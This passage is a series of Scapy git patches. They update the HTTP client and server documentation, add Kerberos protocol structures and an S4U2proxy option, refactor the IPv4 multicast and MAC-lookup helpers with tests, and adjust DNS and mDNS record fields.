client.request("http://127.0.0.1:8080") + client.close() + +You can use the following shorthand to do the same very basic feature: :func:`~scapy.layers.http.http_request`, usable as so: + +.. code:: python + + load_layer("http") + http_request("www.google.com", "/") # first argument is Host, second is Path + +Let's do the same request, but this time to a server that requires NTLM authentication: + +.. code:: python + + from scapy.layers.http import * # or load_layer("http") + client = HTTP_Client( + HTTP_AUTH_MECHS.NTLM, + ssp=NTLMSSP(UPN="user", PASSWORD="password"), + ) + resp = client.request("http://127.0.0.1:8080") + client.close() + +- :class:`~scapy.layers.http.HTTP_Server`: + +Start an unauthenticated HTTP server automaton: + +.. code:: python + + from scapy.layers.http import * + from scapy.layers.ntlm import * + + class Custom_HTTP_Server(HTTP_Server): + def answer(self, pkt): + if pkt.Path == b"/": + return HTTPResponse() / ( + "

      OK

      " + ) + else: + return HTTPResponse( + Status_Code=b"404", + Reason_Phrase=b"Not Found", + ) / ( + "

      404 - Not Found

      " + ) + + server = HTTP_Server.spawn( + port=8080, + iface="eth0", + ) + +We could also have started the same server, but requiring NTLM authorization using: + +.. code:: python + + server = HTTP_Server.spawn( + port=8080, + iface="eth0", + HTTP_AUTH_MECHS.NTLM, + ssp=NTLMSSP(IDENTITIES={"user": MD4le("password")}), + ) + - ``TCP_client.tcplink``: Send an HTTPRequest to ``www.secdev.org`` and write the result in a file: @@ -120,18 +188,9 @@ Send an HTTPRequest to ``www.secdev.org`` and write the result in a file: ``TCP_client.tcplink`` makes it feel like it only received one packet, but in reality it was recombined in ``TCPSession``. If you performed a plain ``sniff()``, you would have seen those packets. -**This code is implemented in a utility function:** ``http_request()``, usable as so: - -.. code:: python - - load_layer("http") - http_request("www.google.com", "/", display=True) - -This will open the webpage in your default browser thanks to ``display=True``. - - ``sniff()``: -Dissect a pcap which contains a JPEG image that was sent over HTTP using chunks. +Dissect a pcap which contains a JPEG image that was sent over HTTP using chunks. This is able to reconstruct all HTTP streams in parallel. .. note:: diff --git a/scapy/asn1/asn1.py b/scapy/asn1/asn1.py index 0a101d16c7f..5df2810efe4 100644 --- a/scapy/asn1/asn1.py +++ b/scapy/asn1/asn1.py @@ -501,6 +501,8 @@ def set(self, i, val): """ val = str(val) assert val in ['0', '1'] + if len(self.val) < i: + self.val += "0" * (i - len(self.val)) self.val = self.val[:i] + val + self.val[i + 1:] def __repr__(self): diff --git a/scapy/asn1fields.py b/scapy/asn1fields.py index 2f1da38b657..e4957b0920d 100644 --- a/scapy/asn1fields.py +++ b/scapy/asn1fields.py @@ -513,7 +513,12 @@ class ASN1F_SET(ASN1F_SEQUENCE): ASN1_tag = ASN1_Class_UNIVERSAL.SET -_SEQ_T = Union['ASN1_Packet', Type[ASN1F_field[Any, Any]], 'ASN1F_PACKET'] +_SEQ_T = Union[ + 'ASN1_Packet', + Type[ASN1F_field[Any, Any]], + 'ASN1F_PACKET', + ASN1F_field[Any, Any], +] class ASN1F_SEQUENCE_OF(ASN1F_field[List[_SEQ_T], @@ -533,10 +538,13 @@ def __init__(self, explicit_tag=None, # type: Optional[Any] ): # type: (...) -> None - if isinstance(cls, type) and issubclass(cls, ASN1F_field): - self.fld = cls - self._extract_packet = lambda s, pkt: self.fld( - self.name, b"").m2i(pkt, s) + if isinstance(cls, type) and issubclass(cls, ASN1F_field) or \ + isinstance(cls, ASN1F_field): + if isinstance(cls, type): + self.fld = cls(name, b"") + else: + self.fld = cls + self._extract_packet = lambda s, pkt: self.fld.m2i(pkt, s) self.holds_packets = 0 elif hasattr(cls, "ASN1_root") or callable(cls): self.cls = cast("Type[ASN1_Packet]", cls) @@ -594,12 +602,21 @@ def build(self, pkt): s = b"".join(raw(i) for i in val) return self.i2m(pkt, s) + def i2repr(self, pkt, x): + # type: (ASN1_Packet, _I) -> str + if self.holds_packets: + return super(ASN1F_SEQUENCE_OF, self).i2repr(pkt, x) # type: ignore + else: + return "[%s]" % ", ".join( + self.fld.i2repr(pkt, x) for x in x # type: ignore + ) + def randval(self): # type: () -> Any if self.holds_packets: return packet.fuzz(self.cls()) else: - return self.fld(self.name, b"").randval() + return self.fld.randval() def __repr__(self): # type: () -> str diff --git a/scapy/layers/kerberos.py b/scapy/layers/kerberos.py index a3e7ec4212b..7b4c06f7790 100644 --- a/scapy/layers/kerberos.py +++ b/scapy/layers/kerberos.py @@ -579,7 +579,7 @@ def m2i(self, pkt, s): 141: "KERB-AUTH-DATA-TOKEN-RESTRICTIONS", 142: "KERB-LOCAL", 143: "AD-AUTH-DATA-AP-OPTIONS", - 144: "AD-TARGET-PRINCIPAL", # not an official name + 144: "KERB-AUTH-DATA-CLIENT-TARGET", } @@ -665,11 +665,13 @@ class AD_AND_OR(ASN1_Packet): 144: "PA-OTP-PIN-CHANGE", 145: "PA-EPAK-AS-REQ", 146: "PA-EPAK-AS-REP", - 147: "PA_PKINIT_KX", - 148: "PA_PKU2U_NAME", + 147: "PA-PKINIT-KX", + 148: "PA-PKU2U-NAME", 149: "PA-REQ-ENC-PA-REP", - 150: "PA_AS_FRESHNESS", + 150: "PA-AS-FRESHNESS", 151: "PA-SPAKE", + 161: "KERB-KEY-LIST-REQ", + 162: "KERB-KEY-LIST-REP", 165: "PA-SUPPORTED-ENCTYPES", 166: "PA-EXTENDED-ERROR", 167: "PA-PAC-OPTIONS", @@ -885,6 +887,7 @@ class KERB_AUTH_DATA_AP_OPTIONS(Packet): 0x4000, { 0x4000: "KERB_AP_OPTIONS_CBT", + 0x8000: "KERB_AP_OPTIONS_UNVERIFIED_TARGET_NAME", }, ), ] @@ -893,18 +896,17 @@ class KERB_AUTH_DATA_AP_OPTIONS(Packet): _AUTHORIZATIONDATA_VALUES[143] = KERB_AUTH_DATA_AP_OPTIONS -# This has no doc..? not in [MS-KILE] at least. -# We use the name wireshark/samba gave it +# This has no doc..? [MS-KILE] only mentions its name. -class KERB_AD_TARGET_PRINCIPAL(Packet): +class KERB_AUTH_DATA_CLIENT_TARGET(Packet): name = "KERB-AD-TARGET-PRINCIPAL" fields_desc = [ StrFieldUtf16("spn", ""), ] -_AUTHORIZATIONDATA_VALUES[144] = KERB_AD_TARGET_PRINCIPAL +_AUTHORIZATIONDATA_VALUES[144] = KERB_AUTH_DATA_CLIENT_TARGET # RFC6806 sect 6 @@ -969,6 +971,69 @@ class PA_PAC_OPTIONS(ASN1_Packet): _PADATA_CLASSES[167] = PA_PAC_OPTIONS +# [MS-KILE] sect 2.2.11 + + +class KERB_KEY_LIST_REQ(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE_OF( + "keytypes", + [], + ASN1F_enum_INTEGER("", 0, _KRB_E_TYPES), + ) + + +_PADATA_CLASSES[161] = KERB_KEY_LIST_REQ + +# [MS-KILE] sect 2.2.12 + + +class KERB_KEY_LIST_REP(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE_OF( + "keys", + [], + ASN1F_PACKET("", None, EncryptionKey), + ) + + +_PADATA_CLASSES[162] = KERB_KEY_LIST_REP + +# [MS-KILE] sect 2.2.13 + + +class KERB_SUPERSEDED_BY_USER(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_PACKET("name", None, PrincipalName, explicit_tag=0xA0), + Realm("realm", None, explicit_tag=0xA1), + ) + + +# [MS-KILE] sect 2.2.14 + + +class KERB_DMSA_KEY_PACKAGE(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_SEQUENCE_OF( + "currentKeys", + [], + ASN1F_PACKET("", None, EncryptionKey), + explicit_tag=0xA0, + ), + ASN1F_optional( + ASN1F_SEQUENCE_OF( + "previousKeys", + [], + ASN1F_PACKET("", None, EncryptionKey), + explicit_tag=0xA0, + ), + ), + KerberosTime("expirationInterval", GeneralizedTime(), explicit_tag=0xA2), + KerberosTime("fetchInterval", GeneralizedTime(), explicit_tag=0xA4), + ) + # RFC6113 sect 5.4.1 @@ -1737,7 +1802,8 @@ def m2i(self, pkt, s): # 24: KDC_ERR_PREAUTH_FAILED # 25: KDC_ERR_PREAUTH_REQUIRED return MethodData(val[0].val, _underlayer=pkt), val[1] - elif pkt.errorCode.val in [18, 29, 41, 60]: + elif pkt.errorCode.val in [13, 18, 29, 41, 60]: + # 13: KDC_ERR_BADOPTION # 18: KDC_ERR_CLIENT_REVOKED # 29: KDC_ERR_SVC_UNAVAILABLE # 41: KRB_AP_ERR_MODIFIED @@ -2444,6 +2510,7 @@ def __init__( additional_tickets=[], u2u=False, for_user=None, + s4u2proxy=False, etypes=None, key=None, port=88, @@ -2519,6 +2586,7 @@ def __init__( self.additional_tickets = additional_tickets # U2U + S4U2Proxy self.u2u = u2u # U2U self.for_user = for_user # FOR-USER + self.s4u2proxy = s4u2proxy # S4U2Proxy self.key = key # See RFC4120 - sect 7.2.2 # This marks whether we should follow-up after an EOF @@ -2674,6 +2742,20 @@ def tgs_req(self): ) ) + # [MS-SFU] S4U2proxy - sect 3.1.5.2.1 + if self.s4u2proxy: + # "PA-PAC-OPTIONS with resource-based constrained-delegation bit set" + tgsreq.root.padata.append( + PADATA( + padataType=ASN1_INTEGER(167), # PA-PAC-OPTIONS + padataValue=PA_PAC_OPTIONS( + options="Resource-based-constrained-delegation", + ), + ) + ) + # "kdc-options field: MUST include the new cname-in-addl-tkt options flag" + kdc_req.kdcOptions.set(14, 1) + # Compute checksum if self.key.cksumtype: authenticator.cksum = Checksum() @@ -2901,6 +2983,7 @@ def krb_tgs_req( u2u=False, etypes=None, for_user=None, + s4u2proxy=False, **kwargs, ): r""" @@ -2950,6 +3033,7 @@ def krb_tgs_req( u2u=u2u, etypes=etypes, for_user=for_user, + s4u2proxy=s4u2proxy, **kwargs, ) cli.run() diff --git a/scapy/layers/l2.py b/scapy/layers/l2.py index 427b11d3592..120868dbb9e 100644 --- a/scapy/layers/l2.py +++ b/scapy/layers/l2.py @@ -59,8 +59,18 @@ _PacketList, ) from scapy.sendrecv import sendp, srp, srp1, srploop -from scapy.utils import checksum, hexdump, hexstr, inet_ntoa, inet_aton, \ - mac2str, valid_mac, valid_net, valid_net6 +from scapy.utils import ( + checksum, + hexdump, + hexstr, + inet_aton, + inet_ntoa, + mac2str, + pretty_list, + valid_mac, + valid_net, + valid_net6, +) # Typing imports from typing import ( @@ -987,18 +997,20 @@ def show(self, *args, **kwargs): """ Print the list of discovered MAC addresses. """ - - data = list() - padding = 0 + data = list() # type: List[Tuple[str | List[str], ...]] for s, r in self.res: manuf = conf.manufdb._get_short_manuf(r.src) manuf = "unknown" if manuf == r.src else manuf - padding = max(padding, len(manuf)) data.append((r[Ether].src, manuf, r[ARP].psrc)) - for src, manuf, psrc in data: - print(" %-17s %-*s %s" % (src, padding, manuf, psrc)) + print( + pretty_list( + data, + [("src", "manuf", "psrc")], + sortBy=2, + ) + ) @conf.commands.register diff --git a/test/scapy/layers/http.uts b/test/scapy/layers/http.uts index 2b2134e2f0c..5d5a4642530 100644 --- a/test/scapy/layers/http.uts +++ b/test/scapy/layers/http.uts @@ -297,7 +297,11 @@ class run_httpserver: print("@ Server started !") def __exit__(self, exc_type, exc_value, traceback): print("@ Stopping http server !") - self.server.shutdown(socket.SHUT_RDWR) + try: + self.server.shutdown(socket.SHUT_RDWR) + except OSError: + pass + self.server.close() if traceback: # failed print("\nTest failed.") diff --git a/test/scapy/layers/l2.uts b/test/scapy/layers/l2.uts index d4d5185670d..4f05574768c 100644 --- a/test/scapy/layers/l2.uts +++ b/test/scapy/layers/l2.uts @@ -25,7 +25,7 @@ with ContextManagerCaptureOutput() as cmco: ar.show() result_ar = cmco.get_output() -assert result_ar.startswith(" 70:ee:50:50:ee:70 Netatmo 192.168.0.1") +assert "70:ee:50:50:ee:70 Netatmo 192.168.0.1" in result_ar = arp_mitm - IP to IP ~ arp_mitm From 4bc73eda1829627381e8f61cd1ab4e2d7bebf524 Mon Sep 17 00:00:00 2001 From: Leonard Crestez Date: Thu, 23 May 2024 00:09:08 +0300 Subject: [PATCH 1283/1632] setup.cfg: Add PEP 561 py.typed marker (#4391) This is required in order to use mypy with scapy annotations in a dependent project. Otherwise you get messages like these: error: Skipping analyzing "scapy.packet": module is installed, but missing library stubs or py.typed marker [import-untyped] --- pyproject.toml | 3 +++ scapy/py.typed | 0 2 files changed, 3 insertions(+) create mode 100644 scapy/py.typed diff --git a/pyproject.toml b/pyproject.toml index 32993eb7fbd..dcbfcc6750d 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -66,6 +66,9 @@ doc = [ # setuptools specific +[tool.setuptools.package-data] +"scapy" = ["py.typed"] + [tool.setuptools.packages.find] include = [ "scapy*", diff --git a/scapy/py.typed b/scapy/py.typed new file mode 100644 index 00000000000..e69de29bb2d From d4f5dd9d8865f1449232d8dc3c06883354984af3 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Fri, 24 May 2024 23:26:32 +0200 Subject: [PATCH 1284/1632] Cleanup getmacbyip and add in4_is* (#4386) * Cleanup getmacbyip and add in4_is* * Apply guedou suggestions --- scapy/layers/inet6.py | 16 +++++-- scapy/layers/l2.py | 29 +++++++++--- scapy/utils.py | 100 +++++++++++++++++++++++++++++++++++++++++- scapy/utils6.py | 24 ++++------ test/regression.uts | 24 +++++++++- 5 files changed, 166 insertions(+), 27 deletions(-) diff --git a/scapy/layers/inet6.py b/scapy/layers/inet6.py index 4602b324505..ad6feaf1a76 100644 --- a/scapy/layers/inet6.py +++ b/scapy/layers/inet6.py @@ -84,6 +84,11 @@ in6_isllsnmaddr, in6_ismaddr, Net6, teredoAddrExtractInfo from scapy.volatile import RandInt, RandShort +# Typing +from typing import ( + Optional, +) + if not socket.has_ipv6: raise socket.error("can't use AF_INET6, IPv6 is disabled") if not hasattr(socket, "IPPROTO_IPV6"): @@ -135,19 +140,24 @@ def neighsol(addr, src, iface, timeout=1, chainCC=0): @conf.commands.register def getmacbyip6(ip6, chainCC=0): - """Returns the MAC address corresponding to an IPv6 address + # type: (str, int) -> Optional[str] + """ + Returns the MAC address used to reach a given IPv6 address. neighborCache.get() method is used on instantiated neighbor cache. Resolution mechanism is described in associated doc string. (chainCC parameter value ends up being passed to sending function used to perform the resolution, if needed) - """ + .. seealso:: :func:`~scapy.layers.l2.getmacbyip` for IPv4. + """ + # Sanitize the IP if isinstance(ip6, Net6): ip6 = str(ip6) - if in6_ismaddr(ip6): # Multicast + # Multicast + if in6_ismaddr(ip6): # mcast @ mac = in6_getnsmac(inet_pton(socket.AF_INET6, ip6)) return mac diff --git a/scapy/layers/l2.py b/scapy/layers/l2.py index 120868dbb9e..49e2d0fdd15 100644 --- a/scapy/layers/l2.py +++ b/scapy/layers/l2.py @@ -15,7 +15,7 @@ from scapy.ansmachine import AnsweringMachine from scapy.arch import get_if_addr, get_if_hwaddr from scapy.base_classes import Gen, Net -from scapy.compat import chb, orb +from scapy.compat import chb from scapy.config import conf from scapy import consts from scapy.data import ARPHDR_ETHER, ARPHDR_LOOPBACK, ARPHDR_METRICOM, \ @@ -63,6 +63,8 @@ checksum, hexdump, hexstr, + in4_getnsmac, + in4_ismaddr, inet_aton, inet_ntoa, mac2str, @@ -131,19 +133,36 @@ def __repr__(self): @conf.commands.register def getmacbyip(ip, chainCC=0): # type: (str, int) -> Optional[str] - """Return MAC address corresponding to a given IP address""" + """ + Returns the MAC address used to reach a given IP address. + + This will follow the routing table and will issue an ARP request if + necessary. Special cases (multicast, etc.) are also handled. + + .. seealso:: :func:`~scapy.layers.inet6.getmacbyip6` for IPv6. + """ + # Sanitize the IP if isinstance(ip, Net): ip = next(iter(ip)) ip = inet_ntoa(inet_aton(ip or "0.0.0.0")) - tmp = [orb(e) for e in inet_aton(ip)] - if (tmp[0] & 0xf0) == 0xe0: # mcast @ - return "01:00:5e:%.2x:%.2x:%.2x" % (tmp[1] & 0x7f, tmp[2], tmp[3]) + + # Multicast + if in4_ismaddr(ip): # mcast @ + mac = in4_getnsmac(inet_aton(ip)) + return mac + + # Check the routing table iff, _, gw = conf.route.route(ip) + + # Broadcast case if (iff == conf.loopback_name) or (ip in conf.route.get_if_bcast(iff)): return "ff:ff:ff:ff:ff:ff" + + # An ARP request is necessary if gw != "0.0.0.0": ip = gw + # Check the cache mac = _arp_cache.get(ip) if mac: return mac diff --git a/scapy/utils.py b/scapy/utils.py index c6624c87660..c612e79b159 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -704,13 +704,22 @@ def zerofree_randstring(length): for _ in range(length)) +def stror(s1, s2): + # type: (bytes, bytes) -> bytes + """ + Returns the binary OR of the 2 provided strings s1 and s2. s1 and s2 + must be of same length. + """ + return b"".join(map(lambda x, y: struct.pack("!B", x | y), s1, s2)) + + def strxor(s1, s2): # type: (bytes, bytes) -> bytes """ Returns the binary XOR of the 2 provided strings s1 and s2. s1 and s2 must be of same length. """ - return b"".join(map(lambda x, y: chb(orb(x) ^ orb(y)), s1, s2)) + return b"".join(map(lambda x, y: struct.pack("!B", x ^ y), s1, s2)) def strand(s1, s2): @@ -719,7 +728,7 @@ def strand(s1, s2): Returns the binary AND of the 2 provided strings s1 and s2. s1 and s2 must be of same length. """ - return b"".join(map(lambda x, y: chb(orb(x) & orb(y)), s1, s2)) + return b"".join(map(lambda x, y: struct.pack("!B", x & y), s1, s2)) def strrot(s1, count, right=True): @@ -819,6 +828,93 @@ def itom(x): return (0xffffffff00000000 >> x) & 0xffffffff +def in4_cidr2mask(m): + # type: (int) -> bytes + """ + Return the mask (bitstring) associated with provided length + value. For instance if function is called on 20, return value is + b'\xff\xff\xf0\x00'. + """ + if m > 32 or m < 0: + raise Scapy_Exception("value provided to in4_cidr2mask outside [0, 32] domain (%d)" % m) # noqa: E501 + + return strxor( + b"\xff" * 4, + struct.pack(">I", 2**(32 - m) - 1) + ) + + +def in4_isincluded(addr, prefix, mask): + # type: (str, str, int) -> bool + """ + Returns True when 'addr' belongs to prefix/mask. False otherwise. + """ + temp = inet_pton(socket.AF_INET, addr) + pref = in4_cidr2mask(mask) + zero = inet_pton(socket.AF_INET, prefix) + return zero == strand(temp, pref) + + +def in4_ismaddr(str): + # type: (str) -> bool + """ + Returns True if provided address in printable format belongs to + allocated Multicast address space (224.0.0.0/4). + """ + return in4_isincluded(str, "224.0.0.0", 4) + + +def in4_ismlladdr(str): + # type: (str) -> bool + """ + Returns True if address belongs to link-local multicast address + space (224.0.0.0/24) + """ + return in4_isincluded(str, "224.0.0.0", 24) + + +def in4_ismgladdr(str): + # type: (str) -> bool + """ + Returns True if address belongs to global multicast address + space (224.0.1.0-238.255.255.255). + """ + return ( + in4_isincluded(str, "224.0.0.0", 4) and + not in4_isincluded(str, "224.0.0.0", 24) and + not in4_isincluded(str, "239.0.0.0", 8) + ) + + +def in4_ismlsaddr(str): + # type: (str) -> bool + """ + Returns True if address belongs to limited scope multicast address + space (239.0.0.0/8). + """ + return in4_isincluded(str, "239.0.0.0", 8) + + +def in4_isaddrllallnodes(str): + # type: (str) -> bool + """ + Returns True if address is the link-local all-nodes multicast + address (224.0.0.1). + """ + return (inet_pton(socket.AF_INET, "224.0.0.1") == + inet_pton(socket.AF_INET, str)) + + +def in4_getnsmac(a): + # type: (bytes) -> str + """ + Return the multicast mac address associated with provided + IPv4 address. Passed address must be in network format. + """ + + return "01:00:5e:%.2x:%.2x:%.2x" % (a[1] & 0x7f, a[2], a[3]) + + def decode_locale_str(x): # type: (bytes) -> str """ diff --git a/scapy/utils6.py b/scapy/utils6.py index 5343cdd7106..5bc00e46041 100644 --- a/scapy/utils6.py +++ b/scapy/utils6.py @@ -17,7 +17,11 @@ from scapy.data import IPV6_ADDR_GLOBAL, IPV6_ADDR_LINKLOCAL, \ IPV6_ADDR_SITELOCAL, IPV6_ADDR_LOOPBACK, IPV6_ADDR_UNICAST,\ IPV6_ADDR_MULTICAST, IPV6_ADDR_6TO4, IPV6_ADDR_UNSPECIFIED -from scapy.utils import strxor +from scapy.utils import ( + strxor, + stror, + strand, +) from scapy.compat import orb, chb from scapy.pton_ntop import inet_pton, inet_ntop from scapy.volatile import RandMAC, RandBin @@ -591,18 +595,6 @@ def in6_isanycast(x): # RFC 2526 return False -def _in6_bitops(xa1, xa2, operator=0): - # type: (bytes, bytes, int) -> bytes - a1 = struct.unpack('4I', xa1) - a2 = struct.unpack('4I', xa2) - fop = [lambda x, y: x | y, - lambda x, y: x & y, - lambda x, y: x ^ y - ] - ret = map(fop[operator % len(fop)], a1, a2) - return b"".join(struct.pack('I', x) for x in ret) - - def in6_or(a1, a2): # type: (bytes, bytes) -> bytes """ @@ -610,7 +602,7 @@ def in6_or(a1, a2): passed in network format. Return value is also an IPv6 address in network format. """ - return _in6_bitops(a1, a2, 0) + return stror(a1, a2) def in6_and(a1, a2): @@ -620,7 +612,7 @@ def in6_and(a1, a2): passed in network format. Return value is also an IPv6 address in network format. """ - return _in6_bitops(a1, a2, 1) + return strand(a1, a2) def in6_xor(a1, a2): @@ -630,7 +622,7 @@ def in6_xor(a1, a2): passed in network format. Return value is also an IPv6 address in network format. """ - return _in6_bitops(a1, a2, 2) + return strxor(a1, a2) def in6_cidr2mask(m): diff --git a/test/regression.uts b/test/regression.uts index 868409a32ee..9ac35f5b953 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -532,6 +532,28 @@ assert (Ether() / ARP()).route()[0] is not None assert (Ether() / ARP()).payload.route()[0] is not None assert (ARP(ptype=0, pdst="hello. this isn't a valid IP")).route()[0] is None += utils/in4_is* + +assert in4_ismaddr("224.0.0.1") +assert not in4_ismaddr("192.168.0.1") +assert in4_ismaddr("239.0.0.255") + +assert in4_ismlladdr("224.0.0.1") +assert in4_ismlladdr("224.0.0.255") +assert not in4_ismlladdr("224.0.1.255") + +assert in4_ismgladdr("235.0.0.1") +assert not in4_ismgladdr("224.0.0.1") +assert not in4_ismgladdr("239.0.0.1") + +assert in4_ismlsaddr("239.0.0.1") +assert not in4_ismlsaddr("224.0.0.1") + +assert in4_isaddrllallnodes("224.0.0.1") +assert not in4_isaddrllallnodes("224.0.0.3") + +assert in4_getnsmac(b'\xe0\x00\x00\x01') == '01:00:5e:00:00:01' +assert getmacbyip("224.0.0.1") == '01:00:5e:00:00:01' = plain_str test @@ -944,7 +966,7 @@ random.seed(0x2807) zerofree_randstring(4) in [b"\xd2\x12\xe4\x5b", b'\xd3\x8b\x13\x12'] = Test strand function -assert strand("AC", "BC") == b'@C' +assert strand(b"AC", b"BC") == b'@C' = Test export_object and import_object functions import mock From a795ad6b57035b401b7e4e507a4e2fd925ade670 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sun, 26 May 2024 14:39:08 +0200 Subject: [PATCH 1285/1632] (m)DNS: improve (m)dnsd defaults and behavior (#4390) --- scapy/arch/__init__.py | 8 +- scapy/layers/dns.py | 394 +++++++++++++++++++++++++++--------- test/answering_machines.uts | 36 +++- test/regression.uts | 2 +- test/scapy/layers/dns.uts | 4 +- 5 files changed, 335 insertions(+), 109 deletions(-) diff --git a/scapy/arch/__init__.py b/scapy/arch/__init__.py index 0a692a6cf46..776bbe0e4e9 100644 --- a/scapy/arch/__init__.py +++ b/scapy/arch/__init__.py @@ -18,7 +18,8 @@ ARPHDR_LOOPBACK, ARPHDR_PPP, ARPHDR_TUN, - IPV6_ADDR_GLOBAL + IPV6_ADDR_GLOBAL, + IPV6_ADDR_LOOPBACK, ) from scapy.error import log_loading, Scapy_Exception from scapy.interfaces import _GlobInterfaceType, network_name @@ -104,8 +105,11 @@ def get_if_addr6(niff): None is returned. """ iff = network_name(niff) + scope = IPV6_ADDR_GLOBAL + if iff == conf.loopback_name: + scope = IPV6_ADDR_LOOPBACK return next((x[0] for x in in6_getifaddr() - if x[2] == iff and x[1] == IPV6_ADDR_GLOBAL), None) + if x[2] == iff and x[1] == scope), None) def get_if_raw_addr6(iff): diff --git a/scapy/layers/dns.py b/scapy/layers/dns.py index c19774299e5..eb3301876e5 100644 --- a/scapy/layers/dns.py +++ b/scapy/layers/dns.py @@ -8,6 +8,7 @@ """ import abc +import collections import operator import itertools import socket @@ -39,6 +40,7 @@ I, IP6Field, IntField, + MACField, MultipleTypeField, PacketListField, ShortEnumField, @@ -49,6 +51,7 @@ XStrFixedLenField, XStrLenField, ) +from scapy.interfaces import resolve_iface from scapy.sendrecv import sr1 from scapy.supersocket import StreamSocket from scapy.pton_ntop import inet_ntop, inet_pton @@ -243,7 +246,7 @@ def field_gen(dns_pkt): for field in current.fields_desc: if isinstance(field, DNSStrField) or \ (isinstance(field, MultipleTypeField) and - current.type in [2, 3, 4, 5, 12, 15, 39]): + current.type in [2, 3, 4, 5, 12, 15, 39, 47]): # Get the associated data and store it accordingly # noqa: E501 dat = current.getfieldval(field.name) yield current, field.name, dat @@ -423,7 +426,7 @@ def i2m(self, pkt, s): # RFC 2671 - Extension Mechanisms for DNS (EDNS0) -edns0types = {0: "Reserved", 1: "LLQ", 2: "UL", 3: "NSID", 4: "Reserved", +edns0types = {0: "Reserved", 1: "LLQ", 2: "UL", 3: "NSID", 4: "Owner", 5: "DAU", 6: "DHU", 7: "N3U", 8: "edns-client-subnet", 10: "COOKIE", 15: "Extended DNS Error"} @@ -458,7 +461,7 @@ class DNSRROPT(Packet): name = "DNS OPT Resource Record" fields_desc = [DNSStrField("rrname", ""), ShortEnumField("type", 41, dnstypes), - ShortField("rclass", 4096), + ShortEnumField("rclass", 4096, dnsclasses), ByteField("extrcode", 0), ByteField("version", 0), # version 0 means EDNS0 @@ -469,6 +472,30 @@ class DNSRROPT(Packet): length_from=lambda pkt: pkt.rdlen)] +# draft-cheshire-edns0-owner-option-01 - EDNS0 OWNER Option + +class EDNS0OWN(_EDNS0Dummy): + name = "EDNS0 Owner (OWN)" + fields_desc = [ShortEnumField("optcode", 4, edns0types), + FieldLenField("optlen", None, count_of="primary_mac", fmt="H"), + ByteField("v", 0), + ByteField("s", 0), + MACField("primary_mac", "00:00:00:00:00:00"), + ConditionalField( + MACField("wakeup_mac", "00:00:00:00:00:00"), + lambda pkt: (pkt.optlen or 0) >= 18), + ConditionalField( + StrLenField("password", "", + length_from=lambda pkt: pkt.optlen - 18), + lambda pkt: (pkt.optlen or 0) >= 22)] + + def post_build(self, pkt, pay): + pkt += pay + if self.optlen is None: + pkt = pkt[:2] + struct.pack("!H", len(pkt) - 4) + pkt[4:] + return pkt + + # RFC 6975 - Signaling Cryptographic Algorithm Understanding in # DNS Security Extensions (DNSSEC) @@ -637,6 +664,7 @@ class EDNS0ExtendedDNSError(_EDNS0Dummy): EDNS0OPT_DISPATCHER = { + 4: EDNS0OWN, 5: EDNS0DAU, 6: EDNS0DHU, 7: EDNS0N3U, @@ -741,12 +769,16 @@ def RRlist2bitmap(lst): class RRlistField(StrField): + islist = 1 + def h2i(self, pkt, x): - if isinstance(x, list): + if x and isinstance(x, list): return RRlist2bitmap(x) return x def i2repr(self, pkt, x): + if not x: + return "[]" x = self.i2h(pkt, x) rrlist = bitmap2RRlist(x) return [dnstypes.get(rr, rr) for rr in rrlist] if rrlist else repr(x) @@ -774,7 +806,8 @@ class DNSRRHINFO(_DNSRRdummy): name = "DNS HINFO Resource Record" fields_desc = [DNSStrField("rrname", ""), ShortEnumField("type", 13, dnstypes), - ShortEnumField("rclass", 1, dnsclasses), + BitField("cacheflush", 0, 1), # mDNS RFC 6762 + BitEnumField("rclass", 1, 15, dnsclasses), IntField("ttl", 0), ShortField("rdlen", None), FieldLenField("cpulen", None, fmt="!B", length_of="cpu"), @@ -787,7 +820,8 @@ class DNSRRMX(_DNSRRdummy): name = "DNS MX Resource Record" fields_desc = [DNSStrField("rrname", ""), ShortEnumField("type", 15, dnstypes), - ShortEnumField("rclass", 1, dnsclasses), + BitField("cacheflush", 0, 1), # mDNS RFC 6762 + BitEnumField("rclass", 1, 15, dnsclasses), IntField("ttl", 0), ShortField("rdlen", None), ShortField("preference", 0), @@ -816,7 +850,8 @@ class DNSRRRSIG(_DNSRRdummy): name = "DNS RRSIG Resource Record" fields_desc = [DNSStrField("rrname", ""), ShortEnumField("type", 46, dnstypes), - ShortEnumField("rclass", 1, dnsclasses), + BitField("cacheflush", 0, 1), # mDNS RFC 6762 + BitEnumField("rclass", 1, 15, dnsclasses), IntField("ttl", 0), ShortField("rdlen", None), ShortEnumField("typecovered", 1, dnstypes), @@ -835,11 +870,12 @@ class DNSRRNSEC(_DNSRRdummy): name = "DNS NSEC Resource Record" fields_desc = [DNSStrField("rrname", ""), ShortEnumField("type", 47, dnstypes), - ShortEnumField("rclass", 1, dnsclasses), + BitField("cacheflush", 0, 1), # mDNS RFC 6762 + BitEnumField("rclass", 1, 15, dnsclasses), IntField("ttl", 0), ShortField("rdlen", None), DNSStrField("nextname", ""), - RRlistField("typebitmaps", "") + RRlistField("typebitmaps", []) ] @@ -847,7 +883,8 @@ class DNSRRDNSKEY(_DNSRRdummy): name = "DNS DNSKEY Resource Record" fields_desc = [DNSStrField("rrname", ""), ShortEnumField("type", 48, dnstypes), - ShortEnumField("rclass", 1, dnsclasses), + BitField("cacheflush", 0, 1), # mDNS RFC 6762 + BitEnumField("rclass", 1, 15, dnsclasses), IntField("ttl", 0), ShortField("rdlen", None), FlagsField("flags", 256, 16, "S???????Z???????"), @@ -863,7 +900,8 @@ class DNSRRDS(_DNSRRdummy): name = "DNS DS Resource Record" fields_desc = [DNSStrField("rrname", ""), ShortEnumField("type", 43, dnstypes), - ShortEnumField("rclass", 1, dnsclasses), + BitField("cacheflush", 0, 1), # mDNS RFC 6762 + BitEnumField("rclass", 1, 15, dnsclasses), IntField("ttl", 0), ShortField("rdlen", None), 